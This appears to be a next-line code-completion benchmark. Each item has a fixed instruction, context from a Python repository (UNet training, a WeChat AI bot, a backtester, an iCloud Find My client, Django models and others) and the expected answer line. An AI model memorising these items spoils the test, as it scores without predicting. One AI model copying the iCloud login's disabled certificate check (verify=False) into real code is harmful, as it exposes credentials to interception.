def show_gui(): app = MainGUI() app.mainloop() # Path: examples/example_run.py from hydroecolstm.model_run import run_train from hydroecolstm.utility.plot import plot from hydroecolstm.interface.main_gui import show_gui # Import hydroecolstm function #-----------------------------------------------------------------------------# # Run the model # #-----------------------------------------------------------------------------# # Configuration file config_file = "C:/Users/nguyenta/Documents/GitHub/config.yml" # Train the model => return model, x_scaler, y_scaler, data model, x_scaler, y_scaler, data, config = run_train(config_file) # Visualize result: train_test_period = "train" or "test" for object_id in config["object_id"]: for target in config["target_features"]: p = plot(data, object_id=str(object_id), train_test_period="test", target_feature=target) p.show() #-----------------------------------------------------------------------------# # Work with GUI, use the two lines below to call the GUI # #-----------------------------------------------------------------------------#
show_gui()
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: LuhhLu/Predictive-Video-Segmentation # Path: Unet.py def Load_unet(path=None): if path: unet_model = UNet(n_channels=3, n_classes=49) unet_model.load_state_dict(torch.load(path)) else: unet_model = UNet(n_channels=3, n_classes=49) return unet_model # Path: Unet.py class CustomDataset(Dataset): def __init__(self, image_dir, mask_dir, transform=None): self.image_dir = image_dir self.mask_dir = mask_dir self.transform = transform self.images = os.listdir(image_dir) def __len__(self): return len(self.images) def __getitem__(self, idx): img_name = self.images[idx] img_path = os.path.join(self.image_dir, img_name) # Update mask name to match new naming convention and extension mask_name = img_name.replace('image', 'mask').replace('.png', '.npy') mask_path = os.path.join(self.mask_dir, mask_name) image = Image.open(img_path).convert("RGB") mask = np.load(mask_path) # Load mask as numpy array if self.transform: seed = np.random.randint(2147483647) # Random seed for consistent transformations random.seed(seed) torch.manual_seed(seed) # Apply transformations to the image image = self.transform(image) # One-hot encode the transformed mask mask = one_hot_encode_mask(mask, 49) # Convert the mask back to a tensor mask = torch.from_numpy(mask) return image, mask # Path: Unet.py class WeightedBCEWithLogitsLoss(nn.Module): def __init__(self, weights, reduction='mean'): super().__init__() self.weights = weights self.reduction = reduction self.bce_loss = nn.BCEWithLogitsLoss(reduction='none') def forward(self, inputs, targets): bce_loss = self.bce_loss(inputs, targets) weights_expanded = self.weights.view(1, -1, 1, 1).to(bce_loss.device) weighted_loss = bce_loss * weights_expanded if self.reduction == 'mean': return weighted_loss.mean() elif self.reduction == 'sum': return weighted_loss.sum() else: return weighted_loss # Path: unet_train.py from tqdm import tqdm from torch.utils.data import DataLoader from torchvision import transforms from Unet import Load_unet, CustomDataset, WeightedBCEWithLogitsLoss import torch import torch.optim as optim import argparse def main(): # Command-line arguments parser = argparse.ArgumentParser(description='Train UNet with custom settings') parser.add_argument('--lr', type=float, default=0.001, help='Learning rate') parser.add_argument('--batch', type=int, default=64, help='Batch size') parser.add_argument('--res', type=str, default='full', help='Resolution in the format H,W') parser.add_argument('--epoch', type=int, default=10, help='number of training epochs') args = parser.parse_args() # Process resolution argument if args.res == 'full': transform = transforms.Compose([ transforms.ToTensor(), ]) resolution = (160, 240) else: try: res_value = int(args.res) resolution = (res_value, res_value) transform = transforms.Compose([ transforms.ToTensor(), transforms.Resize(resolution, antialias=True), transforms.Resize((160, 240), antialias=True) ]) except ValueError: raise ValueError("Invalid resolution value. Please provide 'full' or a single number.") if args.res == 'full': print("Training with Resolution: (160, 240)") filename_suffix = 'full' else: res_value = int(args.res) print(f"Training with Resolution: ({res_value}, {res_value})") filename_suffix = str(res_value)
train_dataset = CustomDataset('unet_train/images', 'unet_train/masks', transform)
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: garinops/chat-E-AI # Path: config/settings.py ITCHAT_CALL_CODE_SELF = "AI" # Path: config/settings.py ITCHAT_CALL_CODE = "AI" # Path: config/settings.py ITCHAT_WHITELIST_FRIEND = {} # Path: embed/reply/text.py class EReplyText: @staticmethod def reply(client, message:MessageCea) -> Send: _ceaMsg = message _action = _ceaMsg.Action _send = Send.model_construct() if _action: # 记录日志 client.logger.info(f'Message Signal RX: {_ceaMsg.UserToSession} {UtilsString.log_msg(_ceaMsg.Content)}') """获取session""" _sess = client.get_session(sess_user_name=_ceaMsg.UserToSession) """session 消息入列""" _sess.msgQueue.enqueue_user(message_content=_ceaMsg.Content) # AI sys messages更新。 if _sess.ai.msgSysChck: if _ceaMsg.Content.startswith("###"): _sess.ai.msgSys = _ceaMsg.Content[3:] _sess.ai.msgSysChck = False else: if _ceaMsg.Content.startswith("$$$"): _sess.ai.msgSys = OPENAI_SYSTEM_CONTENT _sess.ai.msgSysChck = True client.logger.info("AI System Role:" + OPENAI_SYSTEM_CONTENT) _sess.msgQueue.clear() """session 消息重新入列""" _sess.msgQueue.enqueue_user(message_content=_ceaMsg.Content) elif _ceaMsg.Content.startswith("###"): _sess.ai.msgSys = _ceaMsg.Content[3:] client.logger.info("AI System Role:" + _sess.ai.msgSys) else: client.logger.info("AI System Role:" + _sess.ai.msgSys) # AI user messages更新。 _sess.ai.msgUserAssi = _sess.msgQueue.queue """AI调用""" _sess.ai.response() _rspAi = _sess.ai.responseAI _rspAns = _rspAi.answer """messages后置处理""" _sess.msgQueue.enqueue_assistant(message_content=_rspAns) """assistant messages入列。""" _sess.ai.msgUserAssi = _sess.msgQueue.queue """会话实例中的OpenAI实例 messages更新。""" # 添加前后缀 # client.logger.debug({"MessageCea":_ceaMsg}) _contentOutput = f'@{_ceaMsg.NickName}\n{EUtilsSuffix.add_suffix(_rspAi)}' if _ceaMsg.IsGroup else EUtilsSuffix.add_suffix(_rspAi) # 返回 _send.content = _contentOutput _send.user = _ceaMsg.UserToReply _send.action = True # client.logger.debug(_send) # 记录日志 client.logger.info(f'Message Signal TX: {_ceaMsg.UserToSession} {UtilsString.log_msg(_contentOutput)}') else: pass return _send # Path: models/messages.py class MessageItchat(BaseModel): FromUserName: str ToUserName: str Type: str User: Optional[User] Content: Optional[str] = None Text: Union[list[str], str, Callable] ActualNickName: Optional[str] = None IsAt: Optional[bool] = False # Path: models/messages.py class MessageCea(BaseModel): UserToReply: Optional[str] = None UserToSession: Optional[str] = None Content: Optional[str] = None Action: Optional[bool] = False NickName: Optional[str] = None IsGroup: Optional[bool] = False # Path: models/send.py class Send(BaseModel): user: Optional[str] = None content: Optional[str] = None action: Optional[bool] = False # Path: embed/clients/itchat/messages/friend.py from config.settings import ITCHAT_CALL_CODE_SELF, ITCHAT_CALL_CODE, ITCHAT_WHITELIST_FRIEND from embed.reply.text import EReplyText from models.messages import MessageItchat, MessageCea from models.send import Send def handle_friend_message(client, message: MessageItchat) -> Send: _callCodeSelf = ITCHAT_CALL_CODE_SELF _callCode = ITCHAT_CALL_CODE
_whiteListFriend = ITCHAT_WHITELIST_FRIEND
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: ruudjuffermans/Event-Driven-Backtester # Path: backtester/events.py class FillEvent(Event): """ Fill event once an order based on the response from the broker Parameters: datetime - A datetime at which the signal is created. symbol - The symbol for current asset. exchange - The exchange, broker where the order is filled quantity - quantity filled direction fill_cost - can contain commission already commission - Defaulted to None if non specified """ def __init__( self, datetime, symbol, exchange, quantity, direction, fill_cost, commission=None, ): self.type = "FILL" self.datetime = datetime self.symbol = symbol self.exchange = exchange self.quantity = quantity self.direction = direction self.fill_cost = fill_cost # Calculate commission if commission is None: self.commission = self._calculate_commission() else: self.commission = commission def _calculate_commission(self): """ TODO: Commission fees to be implemented """ # between 1 and 2% return max(1.5, 0.015 * self.quantity) # Path: backtester/events.py class OrderEvent(Event): """ Order event to be sent to a broker api. It takes into account the quantity, type of ordering, and direction (long, short, exit...) Parameters: symbol - The symbol for current asset. order_type - Whether is it a 'MARKET' or 'LIMIT' order quantity --> TODO: this should be implemented in a risk class (Kelly Criterion, etc) direction - 1 or -1 based on the type """ def __init__(self, symbol, order_type, quantity, direction): self.type = "ORDER" self.symbol = symbol self.order_type = order_type self.quantity = quantity self.direction = direction def print_order(self): """ Outputs the values within the Order. """ print("Order: Symbol=%s, Type=%s, Quantity=%s, Direction=%s") % ( self.symbol, self.order_type, self.quantity, self.direction, ) # Path: backtester/execution.py from abc import abstractmethod from datetime import datetime from .events import FillEvent, OrderEvent class ExecutionHandler: def register(self, events): self.events = events @abstractmethod def execute_order(self, event): raise NotImplementedError("Should implement execute_order()") class SimulatedExecutionHandler(ExecutionHandler): def __init__(self): pass def execute_order(self, event):
if isinstance(event, OrderEvent):
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: liebrandapps/FindMyGUI # Path: findmy/pypush_gsa_icloud.py def icloud_login_mobileme(ctx, second_factor='sms'): username = ctx.cfg.appleId_appleId password = ctx.cfg.appleId_password anisetteUrl = ctx.cfg.general_anisetteHost + ":" + str(ctx.cfg.general_anisettePort) if not username or not password: now = datetime.now() ctx.signInDone = False ctx.requestCreds = int(now.timestamp()) ctx.log.info("[ICLOUD] Waiting for password (90 seconds from now on)") interval = 30 while interval > 0: time.sleep(3.0) if len(ctx.userName) > 0 and len(ctx.password) > 0: username = ctx.userName password = ctx.password interval = 0 continue if not username or not password: ctx.log.error("[ICLOUD] No User/Password received, stopping") return None else: ctx.log.info(f"[ICLOUD] Received User {username} / Password") g = gsa_authenticate(username, password, ctx, second_factor=second_factor) pet = g["t"]["com.apple.gs.idms.pet"]["token"] adsid = g["adsid"] data = { "apple-id": username, "delegates": {"com.apple.mobileme": {}}, "password": pet, "client-id": str(USER_ID), } data = plist.dumps(data) headers = { "X-Apple-ADSID": adsid, "User-Agent": "com.apple.iCloudHelper/282 CFNetwork/1408.0.4 Darwin/22.5.0", "X-Mme-Client-Info": '<MacBookPro18,3> <Mac OS X;13.4.1;22F8> <com.apple.AOSKit/282 (com.apple.accountsd/113)>' } headers.update(generate_anisette_headers(anisetteUrl)) r = requests.post( "https://setup.icloud.com/setup/iosbuddy/loginDelegates", auth=(username, pet), data=data, headers=headers, verify=False, ) return plist.loads(r.content) # Path: findmy/pypush_gsa_icloud.py def generate_anisette_headers(anisetteUrl): try: import pyprovision from ctypes import c_ulonglong import secrets adi = pyprovision.ADI("./anisette/") adi.provisioning_path = "./anisette/" device = pyprovision.Device("./anisette/device.json") if not device.initialized: # Pretend to be a MacBook Pro device.server_friendly_description = "<MacBookPro13,2> <macOS;13.1;22C65> <com.apple.AuthKit/1 (com.apple.dt.Xcode/3594.4.19)>" device.unique_device_identifier = str(uuid.uuid4()).upper() device.adi_identifier = secrets.token_hex(8).lower() device.local_user_uuid = secrets.token_hex(32).upper() adi.identifier = device.adi_identifier dsid = c_ulonglong(-2).value is_prov = adi.is_machine_provisioned(dsid) if not is_prov: print("provisioning...") provisioning_session = pyprovision.ProvisioningSession(adi, device) provisioning_session.provision(dsid) otp = adi.request_otp(dsid) a = {"X-Apple-I-MD": base64.b64encode(bytes(otp.one_time_password)).decode(), "X-Apple-I-MD-M": base64.b64encode(bytes(otp.machine_identifier)).decode()} except ImportError: print(f'pyprovision is not installed, querying {anisetteUrl} for an anisette server') h = json.loads(requests.get(anisetteUrl, timeout=5).text) a = {"X-Apple-I-MD": h["X-Apple-I-MD"], "X-Apple-I-MD-M": h["X-Apple-I-MD-M"]} a.update(generate_meta_headers(user_id=USER_ID, device_id=DEVICE_ID)) return a # Path: findmy/request_reports.py import base64 import datetime import hashlib import json import os import struct import requests from cryptography.hazmat.backends import default_backend from cryptography.hazmat.primitives.asymmetric import ec from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes from findmy.pypush_gsa_icloud import icloud_login_mobileme, generate_anisette_headers class FindMy: def __init__(self, ctx): self.ctx = ctx def sha256(self, data): digest = hashlib.new("sha256") digest.update(data) return digest.digest() def decrypt(self, enc_data, algorithm_dkey, mode): decryptor = Cipher(algorithm_dkey, mode, default_backend()).decryptor() return decryptor.update(enc_data) + decryptor.finalize() def decode_tag(self, data): latitude = struct.unpack(">i", data[0:4])[0] / 10000000.0 longitude = struct.unpack(">i", data[4:8])[0] / 10000000.0 confidence = int.from_bytes(data[8:9], 'big') status = int.from_bytes(data[9:10], 'big') return {'lat': latitude, 'lon': longitude, 'conf': confidence, 'status': status} def getAuth(self, regenerate=False, second_factor='sms'): CONFIG_PATH = os.path.dirname(os.path.realpath(__file__)) + "/auth.json" if os.path.exists(CONFIG_PATH) and not regenerate: with open(CONFIG_PATH, "r") as f: j = json.load(f) else: mobileme = None try:
mobileme = icloud_login_mobileme(self.ctx, second_factor=second_factor)
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: Samuel-Effiong/Django-Dynamic-Table # Path: django_dynamic_table/errors.py class TableHaveNoRow(DynamicTableError): pass # Path: django_dynamic_table/errors.py class TableHaveNoColumn(DynamicTableError): pass # Path: django_dynamic_table/errors.py class ColumnNotInTable(DynamicTableError): pass # Path: django_dynamic_table/errors.py class RowNotInTable(DynamicTableError): pass # Path: django_dynamic_table/errors.py class DuplicateColumnInTable(DynamicTableError): pass # Path: django_dynamic_table/errors.py class DynamicTableError(Exception): pass # Path: django_dynamic_table/errors.py class UnSupportedDataType(TableColumnError): pass # Path: django_dynamic_table/errors.py class CantParseValueToDataType(CellValueError): pass # Path: django_dynamic_table/errors.py class CellDoesNotExist(CellValueError): pass # Path: django_dynamic_table/models.py from typing import Sequence from datetime import datetime from django.db import models from django.utils import timezone from django.utils.translation import gettext_lazy as _ from .errors import ( TableHaveNoRow, TableHaveNoColumn, ColumnNotInTable, RowNotInTable, DuplicateColumnInTable, DynamicTableError, UnSupportedDataType, CantParseValueToDataType, CellDoesNotExist ) """ Creating a Dynamic Table using conventional Django standard This Table gives you more control over it manipulation than Django models Developed by: Samuel Effiong Nkopuruk Email: [email protected] """ __SUPPORTED_DATA_TYPE_CHOICES__ = ( ('char', 'Char'), ('int', 'Int'), ('float', 'Float'), ('bool', 'Bool'), ('textfield', 'TextField'), ('date', 'Date'), ) # Create your models here. class DynamicTable(models.Model): table_name = models.CharField(_('Table Name'), max_length=255, unique=True) table_description = models.TextField(_('Table Description'), blank=True) date_created = models.DateTimeField(_('Date Created'), default=timezone.now) table_columns = models.ManyToManyField('TableColumn', blank=True) table_rows = models.ManyToManyField('TableRow', blank=True) class Meta: ordering = ('-date_created', ) def __str__(self) -> str: return f"{self.table_name}" def __total_table_rows(self) -> int: field = self.table_columns.first() if field and isinstance(field, TableColumn): return self.table_columns.all().count() else: # the table is empty return 0 def __total_table_columns(self) -> int: return self.table_columns.all().count() def table_info(self) -> dict[str, int]: description = { 'rows': self.__total_table_rows(), 'columns': self.__total_table_columns() } return description def is_empty(self) -> bool: table_info = self.table_info() rows = table_info['rows'] columns = table_info['columns'] return True if columns == 0 or rows == 0 else False def is_column(self, column_name: str) -> bool: if not isinstance(column_name, str): raise ValueError("column name must be a str") try: column = self.table_columns.get(column_name=column_name) return True except TableColumn.DoesNotExist: return False def get_supported_data_types(self) -> list[str]: return [data_type[0] for data_type in __SUPPORTED_DATA_TYPE_CHOICES__] def data_type_is_supported(self, data_type: str | list) -> bool | list[bool]: supported_data_types = self.get_supported_data_types() if isinstance(data_type, str): return data_type.lower().strip() in supported_data_types elif isinstance(data_type, (list, tuple, set)): return [_type.lower().strip() in supported_data_types for _type in data_type] else: raise ValueError('arg must be either a str or a sequence') def add_column(self, column_name: str, data_type: str): if isinstance(column_name, str) and isinstance(data_type, str): if not self.data_type_is_supported(data_type): raise UnSupportedDataType() if self.is_column(column_name):
raise DuplicateColumnInTable()
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: gsamil/text-classification # Path: data.py class ClassificationSample(BaseModel): def preprocess_text(text: str) -> str: def get_samples_from_file(file_path: str) -> list[ClassificationSample]: def stratify_samples( samples: list[ClassificationSample], number_per_sample: int ) -> list[ClassificationSample]: def save_categories(train_file: str) -> None: def load_categories() -> Tuple[list[str], dict[str, int]]: def set_feature_dimension(lst: list[int], target_length: int): def print_text_lengths(train_file: str) -> None: # Path: model.py class HyperParameters(BaseModel): class TrainingParameters(BaseModel): class TextClassifier(nn.Module): def to_dict(self) -> dict[Any, Any]: def load_from_json(cls, file_path: str) -> "HyperParameters": def print(self): def to_dict(self) -> dict[Any, Any]: def load_from_json(cls, file_path: str) -> "TrainingParameters": def print(self): def __init__(self, hparameters: HyperParameters): def forward(self, x): def save_model( self, model_dir: str, training_parameters: TrainingParameters ) -> None: def load_from_dir( cls, model_dir: str, device: Union[str, torch.device] ) -> Tuple["TextClassifier", TrainingParameters]: # Path: recommender/dataset.py class ClassificationDataset(Dataset): def __init__( self, samples: list[ClassificationSample], vocab: dict[str, int], categories: list[str], category_to_idx: dict[str, int], feature_size: int, sample_negatives: int | None, shuffle: bool, ): self.data: list[ClassificationSample] = samples self.vocab: dict[str, int] = vocab self.categories: list[str] = categories self.category_to_idx: dict[str, int] = category_to_idx self.feature_size: int = feature_size self.sample_negatives: int | None = sample_negatives self.shuffle: bool = shuffle def __len__(self) -> int: return len(self.data) def __getitem__(self, idx) -> Tuple[torch.LongTensor, list[int], int]: example = self.data[idx] combined_features_positive = [] combined_features_negative = [] for category in self.categories: # this is the part where we convert product text and category to indexes product_text_tokens = [self.vocab[token] for token in example.product_text] category_tokens = [self.vocab[token] for token in category] product_text_token_indexes = set_feature_dimension( product_text_tokens, self.feature_size - len(category_tokens), ) token_indexes = product_text_token_indexes + category_tokens if example.category == category: combined_features_positive.append(token_indexes) else: combined_features_negative.append(token_indexes) if self.sample_negatives is not None: combined_features_negative = random.sample( combined_features_negative, self.sample_negatives ) combined_features_with_labels = [ (feature, 1) for feature in combined_features_positive ] + [(feature, 0) for feature in combined_features_negative] if self.shuffle: random.shuffle(combined_features_with_labels) return ( torch.LongTensor([f for f, _ in combined_features_with_labels]), [l for _, l in combined_features_with_labels], [i for i, (_, l) in enumerate(combined_features_with_labels) if l == 1][0], ) # Path: settings.py CATEGORIES_PATH = "./data/categories.csv" # Path: recommender/train.py import torch import time import os from torch import nn from torch.utils.data import DataLoader from torch.optim.lr_scheduler import ExponentialLR from data import ( vocab, get_samples_from_file, stratify_samples, save_categories, load_categories, ) from model import TextClassifier, TrainingParameters, device, HyperParameters from recommender.dataset import ClassificationDataset from settings import CATEGORIES_PATH # Set `train_file`, `test_file` and `model_dir` apropriately. # Set `negative_samples` to the number of negative samples you want to use. # run with `export PYTHONPATH=. && python recommender/train.py` in the main directory. train_file = "./data/train_cleaned.csv" test_file = "./data/test_cleaned.csv" model_dir = "./recommender/saved_model" if __name__ == "__main__": hparams = HyperParameters(
vocab_size=len(vocab),
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: zhcui/polar_preview # Path: polar/utils/misc.py def mdot(*args): """ Reduced matrix dot. """ return reduce(np.dot, args) # Path: polar/utils/misc.py def kdot(a, b): """ Matrix dot with kpoints. """ ka, s1_a, _ = a.shape kb, _, s2_b = b.shape assert ka == kb res = np.zeros((ka, s1_a, s2_b), dtype=np.result_type(a.dtype, b.dtype)) for k in range(ka): np.dot(a[k], b[k], out=res[k]) return res # Path: polar/utils/misc.py def get_spin_dim(arrays, non_spin_dim=3): """ Get spin dimension for a list of arrays. """ spin = 1 for a in arrays: a = np.asarray(a) if a.ndim == non_spin_dim: continue elif a.ndim == non_spin_dim + 1: spin = max(spin, a.shape[0]) else: raise ValueError return spin # Path: polar/utils/misc.py def add_spin_dim(H, spin, non_spin_dim=3): """ Add an additional dimension to array H. """ H = np.asarray(H) if H.ndim == non_spin_dim: H = H[None] assert H.ndim == (non_spin_dim + 1) if H.shape[0] < spin: H = np.asarray((H[0],) * spin) return H # Path: polar/basis/trans_1e.py import numpy as np import scipy.linalg as la from polar.utils.misc import (mdot, kdot, get_spin_dim, add_spin_dim) #!/usr/bin/env python """ Transform 1e quantities. Authors: Zhi-Hao Cui Tianyu Zhu Shunyue Yuan """ # ***************************************************************************** # Transform functions AO -> LO and LO -> AO # for h1 and rdm1 # ***************************************************************************** def trans_h1_to_lo(h_ao_ao, C_ao_lo): r""" Transform h1 to lo basis, with kpts. h^{LO} = C^{\dagger} h^{AO} C """ h_ao_ao = np.asarray(h_ao_ao) C_ao_lo = np.asarray(C_ao_lo) nkpts = C_ao_lo.shape[-3] nlo = C_ao_lo.shape[-1] res_type = np.result_type(h_ao_ao.dtype, C_ao_lo.dtype) # treat the special case where h is 0 or [0, 0] if h_ao_ao.ndim == 0: # scalar return np.ones((nkpts, nlo, nlo), dtype=res_type) * h_ao_ao elif h_ao_ao.ndim == 1: # [0, 0] spin = len(h_ao_ao) h_lo_lo = np.ones((spin, nkpts, nlo, nlo), dtype=res_type) for s in range(spin): h_lo_lo[s] *= h_ao_ao[s] return h_lo_lo if C_ao_lo.ndim == 3 and h_ao_ao.ndim == 3: h_lo_lo = np.zeros((nkpts, nlo, nlo), dtype=res_type) for k in range(nkpts):
h_lo_lo[k] = mdot(C_ao_lo[k].conj().T, h_ao_ao[k], C_ao_lo[k])